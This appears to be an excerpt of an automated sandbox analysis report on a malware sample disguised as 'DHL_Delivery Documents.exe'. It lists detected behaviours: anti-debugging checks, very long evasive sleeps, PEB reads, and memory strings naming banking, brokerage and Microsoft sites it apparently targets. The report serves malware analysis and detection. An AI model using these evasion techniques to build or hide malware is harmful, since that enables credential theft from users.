Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: 7590000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: 8590000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Memory allocated: 760000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Memory allocated: 2480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Memory allocated: 22B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Memory allocated: 5A50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Memory allocated: 6A50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Memory allocated: 6B90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Memory allocated: 7B90000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C5096E rdtsc 8_2_01C5096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8301 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1340 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8762 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 946 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe API coverage: 0.7 %
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe API coverage: 0.2 %
Source: C:\Windows\SysWOW64\setx.exe API coverage: 2.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe TID: 2568 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768 Thread sleep count: 8762 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608 Thread sleep count: 946 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe TID: 7236 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe TID: 7972 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe TID: 7972 Thread sleep time: -94000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe TID: 8040 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\setx.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\setx.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0042BF20 FindFirstFileW,FindNextFileW,FindClose, 18_2_0042BF20
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs.comVMware20,1
Source: y11J94u5t.18.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: azure.comVMware20,116964286
Source: y11J94u5t.18.dr Binary or memory string: discord.comVMware20,11696428655f
Source: y11J94u5t.18.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: y11J94u5t.18.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: global block list test formVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: y11J94u5t.18.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: y11J94u5t.18.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: date_createdINTEGERazure.comVMware20,116964286
Source: y11J94u5t.18.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: y11J94u5t.18.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: y11J94u5t.18.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: y11J94u5t.18.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: y11J94u5t.18.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: y11J94u5t.18.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279541327.00000000008BF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2999530343.000001618DA8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: y11J94u5t.18.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: y11J94u5t.18.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: y11J94u5t.18.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: y11J94u5t.18.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: y11J94u5t.18.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: y11J94u5t.18.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: y11J94u5t.18.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: y11J94u5t.18.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: y11J94u5t.18.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: setx.exe, 00000012.00000002.3278866707.000000000065E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc(KIM
Source: y11J94u5t.18.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: y11J94u5t.18.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C5096E rdtsc 8_2_01C5096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004179A3 LdrLoadDll, 8_2_004179A3
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD61C3 mov eax, dword ptr fs:[00000030h] 8_2_01CD61C3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD61C3 mov eax, dword ptr fs:[00000030h] 8_2_01CD61C3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h] 8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h] 8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E1D0 mov ecx, dword ptr fs:[00000030h] 8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h] 8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h] 8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE61E5 mov eax, dword ptr fs:[00000030h] 8_2_01CE61E5
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C401F8 mov eax, dword ptr fs:[00000030h] 8_2_01C401F8
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C50185 mov eax, dword ptr fs:[00000030h] 8_2_01C50185
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CCC188 mov eax, dword ptr fs:[00000030h] 8_2_01CCC188
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CCC188 mov eax, dword ptr fs:[00000030h] 8_2_01CCC188
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB4180 mov eax, dword ptr fs:[00000030h] 8_2_01CB4180
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB4180 mov eax, dword ptr fs:[00000030h] 8_2_01CB4180
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h] 8_2_01C9019F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h] 8_2_01C9019F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h] 8_2_01C9019F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h] 8_2_01C9019F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h] 8_2_01C0A197
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h] 8_2_01C0A197
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h] 8_2_01C0A197
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h] 8_2_01CA4144
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h] 8_2_01CA4144
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA4144 mov ecx, dword ptr fs:[00000030h] 8_2_01CA4144
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h] 8_2_01CA4144
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h] 8_2_01CA4144
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA8158 mov eax, dword ptr fs:[00000030h] 8_2_01CA8158
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16154 mov eax, dword ptr fs:[00000030h] 8_2_01C16154
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16154 mov eax, dword ptr fs:[00000030h] 8_2_01C16154
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0C156 mov eax, dword ptr fs:[00000030h] 8_2_01C0C156
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE4164 mov eax, dword ptr fs:[00000030h] 8_2_01CE4164
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE4164 mov eax, dword ptr fs:[00000030h] 8_2_01CE4164
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h] 8_2_01CBE10E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBA118 mov ecx, dword ptr fs:[00000030h] 8_2_01CBA118
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h] 8_2_01CBA118
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h] 8_2_01CBA118
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h] 8_2_01CBA118
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD0115 mov eax, dword ptr fs:[00000030h] 8_2_01CD0115
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C40124 mov eax, dword ptr fs:[00000030h] 8_2_01C40124
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C920DE mov eax, dword ptr fs:[00000030h] 8_2_01C920DE
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0A0E3 mov ecx, dword ptr fs:[00000030h] 8_2_01C0A0E3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C180E9 mov eax, dword ptr fs:[00000030h] 8_2_01C180E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C960E0 mov eax, dword ptr fs:[00000030h] 8_2_01C960E0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0C0F0 mov eax, dword ptr fs:[00000030h] 8_2_01C0C0F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C520F0 mov ecx, dword ptr fs:[00000030h] 8_2_01C520F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1208A mov eax, dword ptr fs:[00000030h] 8_2_01C1208A
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C080A0 mov eax, dword ptr fs:[00000030h] 8_2_01C080A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA80A8 mov eax, dword ptr fs:[00000030h] 8_2_01CA80A8
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD60B8 mov eax, dword ptr fs:[00000030h] 8_2_01CD60B8
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD60B8 mov ecx, dword ptr fs:[00000030h] 8_2_01CD60B8
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C12050 mov eax, dword ptr fs:[00000030h] 8_2_01C12050
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C96050 mov eax, dword ptr fs:[00000030h] 8_2_01C96050
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3C073 mov eax, dword ptr fs:[00000030h] 8_2_01C3C073
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C94000 mov ecx, dword ptr fs:[00000030h] 8_2_01C94000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h] 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h] 8_2_01C2E016
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h] 8_2_01C2E016
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h] 8_2_01C2E016
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h] 8_2_01C2E016
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0A020 mov eax, dword ptr fs:[00000030h] 8_2_01C0A020
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0C020 mov eax, dword ptr fs:[00000030h] 8_2_01C0C020
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA6030 mov eax, dword ptr fs:[00000030h] 8_2_01CA6030
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CCC3CD mov eax, dword ptr fs:[00000030h] 8_2_01CCC3CD
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A3C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A3C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A3C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A3C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A3C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A3C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h] 8_2_01C183C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h] 8_2_01C183C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h] 8_2_01C183C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h] 8_2_01C183C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C963C0 mov eax, dword ptr fs:[00000030h] 8_2_01C963C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h] 8_2_01CBE3DB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h] 8_2_01CBE3DB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE3DB mov ecx, dword ptr fs:[00000030h] 8_2_01CBE3DB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h] 8_2_01CBE3DB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB43D4 mov eax, dword ptr fs:[00000030h] 8_2_01CB43D4
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB43D4 mov eax, dword ptr fs:[00000030h] 8_2_01CB43D4
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h] 8_2_01C203E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h] 8_2_01C2E3F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h] 8_2_01C2E3F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h] 8_2_01C2E3F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C463FF mov eax, dword ptr fs:[00000030h] 8_2_01C463FF
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h] 8_2_01C0E388
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h] 8_2_01C0E388
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h] 8_2_01C0E388
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3438F mov eax, dword ptr fs:[00000030h] 8_2_01C3438F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3438F mov eax, dword ptr fs:[00000030h] 8_2_01C3438F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h] 8_2_01C08397
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h] 8_2_01C08397
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h] 8_2_01C08397
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h] 8_2_01C92349
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE634F mov eax, dword ptr fs:[00000030h] 8_2_01CE634F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h] 8_2_01C9035C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h] 8_2_01C9035C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h] 8_2_01C9035C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9035C mov ecx, dword ptr fs:[00000030h] 8_2_01C9035C
